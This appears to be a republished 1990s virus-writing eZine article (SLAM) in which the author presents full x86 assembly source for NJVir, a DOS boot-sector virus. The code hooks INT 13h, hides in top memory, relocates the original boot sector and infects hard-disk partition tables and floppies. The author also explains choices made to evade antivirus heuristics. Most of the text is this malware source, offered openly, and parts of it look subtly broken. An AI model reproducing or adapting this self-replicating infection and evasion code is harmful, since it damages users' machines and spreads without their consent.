Copy Link
Add to Bookmark
Report

SLAM4.035: NJVir by Somniun

eZine's profile picture
Published in 
Slam
 · 2 years ago

NJVIR
by Somniun :)

somniun@hotmail.com

NJvir is a BOOT virus and like every boots viruses it is TSR. When system is booting with NJvir the true boot it is translated to sector 9 and this virus hook INT 13h, then all access to the diskettes is controlled by virus.

The most important characteristic of this virus is that I avoided set of instruction that antivirus programs checks.
example:

   mov cl,6 
shl ax,cl


together a usage of direction [0413] cause that AVP program detect that code like to " GENERIC BOOT VIRUS ".

In error's situation virus execute a warm boot, it is more quickly than management of error by virus and take less amount of instruction code and in a boot virus it is perfectly tolerate.
Finally , this was my first virus ,some years ago, recently I have changed this signature by "NJ", and its name.Even though, this was my first virus with no sophisticates technical.... even AVP not detect it.... 8) .... readers take out your own conclusion....

unico segment 
assume cs:unico,ss:unico,ds:unico,es:unico
org 0h ;no PSP therefore start at offset 0
;--------- define constant and datas
pgm proc

entrada: jmp inic
boot_table db 59 dup (?) ;space for data of original bbot

inic: jmp begin
;name db 'NJVIR, wrote :winter 96, modify: winter 98',13,10,'$'
;author db ' Copyright (C) Somniun, winter 98',13,10,'$'


drive db (?) ;after post(booting) drive will be with DL value,bcoz
;system leave in DL the drive that was the drive
;booting.

truei13 dd ?
c55 db 'NJ'
cAA db 'AA'
begin: mov drive,dl ;keep DL value which register the drive of what
;virus came
;---------------------------------------------------------------------------
;here I change the size of memory RAM that report system, this way avoid that
;other program override code virus. My virus assume that system have 640k,
;most system today have 640k.So I avoid some instruction that AVP (antivirus
;program)check in heuristic mode. And size virus will be small.
mov ax,cs:[0413h] ;in 0413 it is the value of RAM, virus change it size
; 638K=27Eh 640k=280h
dec ax
dec ax
mov cs:[0413h],ax
;----------------------------------------------------------------------------
;I move virus to top of RAM, that I have protected
mov si,7c00h ;post keep code virus in 0000:7c00
xor di,di
mov dx,9fa1h ;new virus segment
mov cx, 200h ;virus size 200h=512bytes=size of boot sector
push dx
pop es
push cs
pop ds
cld
repz movsb
;-------------------------------------------------------------------------
; N E W P O S I T I O N I N R A M
;------ jmp 9fa1:0091 ;segment and offset where continue execution in
mov ax,9fa1h ;top ram
mov es,ax
mov ax,offset newram
push es
push ax ;execute jmp to 9fa1:xxxx
; retf ;jmp intersegments
retf
;---------------------------------------------------------------------------
newram:
mov dl,drive
xor dl,0 ; did virus come from floppy ?
je floppy
;-------------------------------------------------------------------------
;virus was booting from Hard Disk. Virus restore original boot . Trap INT13h
;give control to original boot and go.
xor ax,ax ; I'm preparing process for read original boot in
;0000:7c00
mov es,ax
mov ax,0201
mov cx,0009 ;origin al boot is in sector 9
mov dx,0180
; memory for original boot by default
mov bx,7c00h ;
int 13h
jc reboot
call fin
;---------------------------------------------------------------
; R E E B O O T
REBOOT: ;warm boot
mov ax,40h
mov es,ax
mov word ptr es:[72],1234
mov ax,0ffffh
mov es,ax
xor ax,ax
push es
push ax
retf ;jmp ffff:0000
;-------------------------------------------------------------------------
; F I N
;Here virus trap INT 13 and keep itself TSR ,then give control to original
;boot
FIN:
xor ax,ax
mov ds,ax
cli
mov ax,ds:[004ch] ;get segment and offset of true INT 13
mov word ptr cs:truei13,ax
mov ax,ds:[004eh]
mov word ptr cs:truei13+2,ax
; now hook INT 13
mov cx, offset trap_13
mov word ptr ds:[004eh],cx
mov cx,9fa1h
mov word ptr ds:[004ch],cx
; -- jmp to 0000:7c00 -----
mov ax,7c00h
mov es,ax
xor ax,ax
push es
push ax
retf ; verificar si realiza el salto de
;segmento correctamente
; db 0eah,0,7ch,0,0 equal= jmp 0000:7c00
;_________________________________________________________________________
; F L O O P Y
; Virus came from floopy. Load the true boot in 0000:7c00
;Read Partition Table (HD) in its data area, then
;check if Hard Disk it is infected ( by try with its signature "NJ" )
floppy:
; load true boot from floppy
xor dx,dx
xor ax,ax
mov es,ax
mov bx,7c00h
mov ax,0201h
mov cx,0009
int 13h
jc reboot
; load Partition Table for infection
mov ax,9fa1h
mov es,ax
mov ax,0201h ;preparing parameters for read partition table
mov bx,200h
mov cx,0001
mov dx,0180h
int 13h
mov ax,4a4eh ; " N " =4a " J " = 4e
cmp ax,word ptr cs:[0246h] ; compare ax with [043e]
jne infechd ; if don't found "NJ" then go to infection of HD
call fin ;HD was infected then virus trap int 13h and go.
;__________________________________________________________________________
;Here I'll infect Partition Table
;____________________________________________________________________________
;----- hacer el llamado a la int 8 para encriptar segun los minutos----
;
infechd: mov ax,9fa1h
mov es,ax
mov ax,0301h ;prepare parameter for move original boot to sector 9
mov bx,200h
mov cx,0009
mov dx,0080h
int 13h
jc rebooti ;if action fail try a new reboot
rebooti: call cs:reboot
;I overwrite the old PT with my virus. I keep old data betwen 1BEh and 1FEh,
;bcoz they are vital data of old PT.
mov si,0000
mov di,200h
mov cx,1bdh
rep movsb
; Now I write the new infected PT
mov ax,9fa1h
mov es,ax
mov ax,0301h
mov bx,200h
mov cx,0009
mov dx,0080
int 13h
jc rebooti
call fin
;__________________________________________________________________
; H E R E H O O K I N T 13 A N D I T I S C O D E
; O F N E W I N T 13
; objetive: infect all new floppys
trap_13:
push ax
push bx
push dx
push cx
push ds
push es
push si
push di
; load floppy boot
mov ax,201h
mov bx,200
xor cx,cx
pushf
call cs:truei13
jc rebooti
mov ax,4a4eh
cmp ax,[043eh]
jne infec_flop
; flopy was infected then restore all flag and go to int13 original
jmpi13: pop di
pop si
pop es
pop ds
pop cx
pop dx
pop bx
pop ax
pushf
call cs:truei13
iret
;____________________________________________________________________
; I N F E C C I O N O F F L O P P Y
;first I move the original boot to sector 09
;
infec_flop :
mov ax,301h
mov bx,200h
mov cl,09h
mov dh,1
call cs:truei13
;now I'll infect the new floppy, before I must keep header of the original
;boot, that contain vital data about floppy disk for system,
;like bytes per sectors,sector per cluster,number of fats, etc.

mov si,1eh
mov di,21eh
mov cx,1e3h ; 1e3=483 byte that I must copy over original boot
rep movsb
; also must copy 2 last byte.... 55AA ...
; mov ax,55AA
; mov cs:[3feh],ax ;3fe = position 510 byte of the new infected boot
;where is mark 55AA
; now I copy 3 first bytes where is the JMP to begin of my virus
mov cx,3
mov si, 0000
mov di, 200h
repz movsb
;
;infeccion is over, now I give control to the true INT 13
jmp jmpi13

;_____________________________________________________________________
pgm endp
unico ends
end entrada

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT